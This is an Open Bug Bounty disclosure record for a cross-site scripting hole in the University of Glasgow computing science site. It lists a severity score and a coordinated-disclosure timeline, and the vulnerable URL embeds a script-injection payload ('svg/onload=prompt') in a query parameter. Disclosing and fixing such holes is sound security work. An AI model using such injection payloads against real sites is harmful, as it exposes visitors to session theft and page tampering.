dcs.gla.ac.uk XSS vulnerability

2017-12-31T12:24:00
ID OBB:472255
Type openbugbounty
Reporter keritzy
Modified 2018-04-02T00:28:00

Description

Open Bug Bounty ID: OBB-472255

Description| Value
---|---
Affected Website:| dcs.gla.ac.uk
Vulnerable Application:| Custom Code
Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Remediation Guide:| OWASP XSS Prevention Cheat Sheet

Vulnerable URL:
http://www.dcs.gla.ac.uk/publications/paperdetails.cfm?id=9192%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&author;_list=Joho%2CH.%3BHopfgartner%2CF.%3BJose%2CJ.M.%3Bvan%20Rijsbergen%2CC.J.&abstract;=This%20report%20describes%20AIR%202008%2C%20the%20second%20international%20workshop%20on%20Adaptive%20Information%20Retrieval%20%28AIR%29%2C%20held%20in%20October%202008%20at%20London%2C%20UK.%20The%20workshop%20attracted%20over%2030%20participants%20across%20the%20world%20and%20the%20largest%20workshop%20held%20in%20conjunction%20with%20IIiX%202008.%20The%20presentation%20ranged%20widely%20from%20theories%20to%20practices%20on%20Adaptive%20Information%20Retrieval.%20The%20workshop%20consisted%20of%20two%20keynote%20presentations%2C%20three%20oral%20presentations%2C%20breakout%20sessions%2C%20and%20poster%20session.&keywords;=&title;=AIR%202008%3A%20Second%20International%20Workshop%20on%20Adaptive%20Information%20Retrieval&year;=2009-01-01%2000:00:00.0
Coordinated Disclosure Timeline

Description| Value
---|---
Vulnerability Reported:| 31 December, 2017 12:24 GMT
Vulnerability Verified:| 1 January, 2018 08:59 GMT
Website Operator Notified:| 1 January, 2018 08:59 GMT
Vulnerability Published:| 1 January, 2018 08:59 GMT[without any technical details]
Vulnerability Fixed:| 2 April, 2018 00:28 GMT
Public Disclosure:| 2 April, 2018 00:28 GMT